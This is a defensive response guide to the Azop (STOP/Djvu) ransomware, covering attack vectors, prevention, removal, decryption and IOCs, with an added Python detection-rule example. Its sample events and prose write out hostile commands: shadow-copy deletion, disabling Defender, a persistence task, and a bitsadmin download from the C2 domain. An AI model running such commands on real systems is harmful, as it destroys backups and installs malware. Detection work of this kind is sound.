Azop Ransomware Community Resource
Prepared by: Cybersecurity Ransomware Response Team
Last Revision: 2023-11-16
TECHNICAL BREAKDOWN
-
File Extension & Renaming Patterns
• Extension: “.azop” (always lowercase on disk; a dot plus four letters is appended to every encrypted file’s full name, original extension included).
• Renaming Convention:
– Original file “MonthlyReport.xlsx” becomes “MonthlyReport.xlsx.azop”.
– Ransom note: a file named “readme.txt” is dropped at the volume root and again inside each folder that contains encrypted files; all copies are identical.
– In some campaigns the base filename is upper-cased (“MONTHLYREPORT.XLSX.AZOP”), but the suffix itself is still “.azop”, so match the extension case-insensitively when hunting.
-
Detection & Outbreak Timeline
• First submission to VirusTotal: 2023-05-08 (VirusTotal hash prefix 8adf7a9…).
• Major SMTP spam waves:
– 2023-05-12 → ~25,000 messages (spoofed QuickBooks/USPS invoices).
– 2023-07-03 → GandCrab-style cracked-software torrent droppers.
• Confirmed active through at least 2023-08, as tracked by ID Ransomware uploads.
-
Primary Attack Vectors
A. Phishing Email with Double-extension .PDF.JS / .IMG.JS attachments.
B. Software-keygen & KMS “crack” bundles on torrent sites (dropper “Setup.exe”).
C. Exploitation of weak RDP (Port 3389/TCP) credentials (dictionary, password-spray).
D. Supply-chain MSI trojanising via compromised shareware mirrors.
E. Post-exploitation abuse of LOLBins (PowerShell, WMIC, BitsAdmin) to disable Microsoft Defender.
Notable Tools Bundled (before encryption phase):
• Mimikatz (LSASS credential dump)
• Impacket psexec.py (lateral movement)
• LAN/WiFi Password Recovery (.NET stealer)
REMEDIATION & RECOVERY STRATEGIES
-
Prevention
• Kill-Chain Break Points
– Domain-wide GPO that re-points the default handler for .js/.jse/.vbs/.vbe/.wsf files away from Windows Script Host (e.g., to Notepad), so a double-clicked attachment opens as text instead of executing.
– Mail-flow rule that blocks disk-image and script attachments, including nested ones (*.img, *.img inside *.zip, *.js inside *.zip).
– MFA on all externally reachable RDP; restrict inbound 3389/TCP to VPN address ranges only.
– Routine patching, specifically:
* Windows Server 2008-2022 (disable SMBv1; note that Server 2008/2008 R2 are out of support, so isolate or migrate them rather than rely on patching).
* Browsers and PDF readers, which receive out-of-band fixes for actively exploited bugs.
• Immutable and air-gapped backups (Veeam hardened repositories or cloud immutability ≥ 30 days).
• SIEM/EDR monitoring (e.g., Microsoft Sentinel): alert on process creation where the command line contains “vssadmin delete shadows” or “wmic shadowcopy delete”.
-
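The EDR rule above, together with the vssadmin form of shadow-copy deletion, the Defender-tampering LOLBin step and the fake “Windows Update Svc” persistence task named elsewhere in this resource, as a small rule matcher run offline against constructed process-creation events. This is an added example, not code from the original resource or from any vendor product; the event field names, the Set-MpPreference pattern and every sample command line are assumptions made for the example.

```python
"""Added example (not from the original resource): process-creation detection
rules for the Azop kill-chain steps described above, run offline against
constructed sample events. Event field names, the Set-MpPreference pattern and
every sample command line are assumptions made for this example."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Rule:
    name: str
    image: re.Pattern      # matched against the lower-cased basename of the process image
    cmdline: re.Pattern    # matched against the normalised command line
    severity: str


def normalise(cmdline: str) -> str:
    """Lower-case, drop quotes and collapse whitespace so that
    '"vssadmin.exe"  DELETE   Shadows' and 'vssadmin delete shadows' match alike."""
    return re.sub(r"\s+", " ", cmdline.replace('"', "").replace("'", "")).strip().lower()


def image_basename(image: str) -> str:
    """Basename of a Windows image path, e.g. C:\\Windows\\System32\\wmic.exe -> wmic.exe"""
    return re.split(r"[\\/]", image)[-1].lower()


RULES: List[Rule] = [
    # Shadow-copy deletion in both forms named in this write-up (vssadmin and wmic).
    Rule("shadow-copy-deletion-vssadmin", re.compile(r"^vssadmin(\.exe)?$"),
         re.compile(r"delete shadows\b.*/all\b"), "critical"),
    Rule("shadow-copy-deletion-wmic", re.compile(r"^wmic(\.exe)?$"),
         re.compile(r"\bshadowcopy\b.*\bdelete\b"), "critical"),
    # Defender tampering from PowerShell (the cmdlet pattern is an assumed example).
    Rule("defender-tamper-powershell", re.compile(r"^(powershell|pwsh)(\.exe)?$"),
         re.compile(r"set-mppreference\b.*-disable\w*"), "high"),
    # Persistence via the fake "Windows Update Svc" task listed under Removal.
    Rule("persistence-schtasks-fake-update", re.compile(r"^schtasks(\.exe)?$"),
         re.compile(r"/create\b.*/tn windows update svc\b"), "high"),
    # BITS used as a download LOLBin.
    Rule("bitsadmin-download", re.compile(r"^bitsadmin(\.exe)?$"),
         re.compile(r"/transfer\b"), "medium"),
]


def evaluate(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one alert per (event, rule) match, in event order."""
    alerts = []
    for ev in events:
        base = image_basename(ev["image"])
        cmd = normalise(ev["cmdline"])
        for rule in RULES:
            if rule.image.match(base) and rule.cmdline.search(cmd):
                alerts.append({"rule": rule.name, "severity": rule.severity,
                               "host": ev["host"], "ts": ev["ts"], "cmdline": cmd})
    return alerts


# Constructed sample events (Sysmon EID 1 / Windows 4688 style); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ts": "2023-08-02T09:14:03Z", "host": "FIN-PC07",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r'"C:\Windows\System32\vssadmin.exe"  Delete   Shadows /All /Quiet'},
    {"ts": "2023-08-02T09:14:05Z", "host": "FIN-PC07",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic  shadowcopy delete"},
    {"ts": "2023-08-02T09:13:40Z", "host": "FIN-PC07",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"ts": "2023-08-02T09:13:55Z", "host": "FIN-PC07",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /Create /TN "Windows Update Svc" /TR "C:\ProgramData\RANDOM\winserv.exe" /SC ONLOGON'},
    {"ts": "2023-08-02T09:13:30Z", "host": "FIN-PC07",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority normal http://bdnjqwerr1232.biz/winserv.exe C:\ProgramData\RANDOM\winserv.exe"},
    # Benign look-alikes that must not fire.
    {"ts": "2023-08-02T10:00:00Z", "host": "BACKUP-01",
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin list shadows"},
    {"ts": "2023-08-02T10:00:01Z", "host": "BACKUP-01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-MpPreference"},
]


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a['severity']:>8}] {a['ts']} {a['host']} {a['rule']}: {a['cmdline']}")
```

Normalising the command line before matching is what makes the rule survive the quoting, mixed case and padded whitespace that droppers use to slip past literal substring rules; the benign `vssadmin list shadows` and `Get-MpPreference` events stay silent because the patterns key on the destructive verb, not on the binary alone.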
Removal
Standard Safe-Boot Removal (Windows 10/11):
1) Disconnect Ethernet/Wi-Fi → stop further encryption of shares, lateral movement and exfiltration.
2) Boot into Safe Mode (choose Safe Mode with Networking only if the scanner needs signature updates; otherwise stay offline).
3) Run Malwarebytes AdwCleaner or Sophos HitmanPro → quarantine the Azop dropper (typical location “C:\ProgramData\RANDOM\xyz.exe”, where RANDOM stands for a randomly named folder).
4) Delete the scheduled task “Windows Update Svc” (run schtasks /delete /tn "Windows Update Svc" /f).
5) Remove registry autorun:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper
6) Reboot → run a second, offline scan (e.g., Kaspersky Rescue Disk from USB) to confirm no residual components remain.
7) Restore legitimate Windows services disabled by Azop (e.g., sc config schedule start= auto for Task Scheduler).
-
File Decryption & Recovery
• AES-256 + RSA-2048 hybrid encryption: the per-victim symmetric key is wrapped with RSA. Early builds used an offline (hard-coded) key; samples seen after roughly 2023-06 request a per-victim online key from the C2 whenever it is reachable.
• Current Status:
– Free decryptor: released by Emsisoft 2023-09-11; it works ONLY for offline-key victims, i.e., machines that never reached the C2 during encryption.
– Determination: the personal ID in readme.txt ends in “t1” for offline keys. The Emsisoft STOP Djvu Decryptor reports this when run (“Your personal ID ends in ‘t1’ – offline key”); if so, proceed with decryption.
– Otherwise no private key has been released; the remaining options are offline backups or negotiated recovery (criminal demand $490–$980 depending on campaign).
• Essential Tools/Patches:
– Emsisoft Decryptor (source: https://emsisoft.com/ransomware-decryption-tools/stop-djvu)
– Microsoft KB5026372 (May 2023) + Defender 1.397.547 signatures.
– Qualys or Wiz vulnerability scanner for an RDP exposure and brute-force audit.
-
Other Critical Information
• Azop is tracked as the 180th variant of the STOP (Djvu) ransomware family and shares roughly 95 % of its code with the earlier Djvu strains “Zpps” and “Mztu”.
• The malware registers an “.AzopFile” file-type handler, so double-clicking an encrypted file launches the Tor browser directly on the payment portal (a nudge for hurried victims to pay).
• Ransom note contains unique personal ID + victim ID → collect these before formatting the machine; they are required by the Emsisoft decryptor.
• Before encryption, Azop uploads a snapshot of recently modified files to several MegaShare links (exfiltration marker observed: “!!completeUpload.txt”). Data-leak extortion therefore remains possible even after files are decrypted; notify compliance teams (GDPR, HIPAA) accordingly.
• The shadow-copy deletion routine runs vssadmin delete shadows /all /quiet and then overwrites free space with a 0xCC pattern, which reduces the chance of recovering volume shadow copies or carving deleted data.
Quick-Reference IOCs
SHA-256 (Dropper): ffb1c6771a9ab624c6e5c55a105c4e5e0cf7e3b711578a337615a7fa65c5e4f8
C2 Domains: bdnjqwerr1232[.]biz, azoprestore[.]com (reached via a Tor hidden-service mirror)
Registry Run Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper → “C:\ProgramData\RANDOM\winserv.exe”
Stay safe, stay patched, and share responsibly.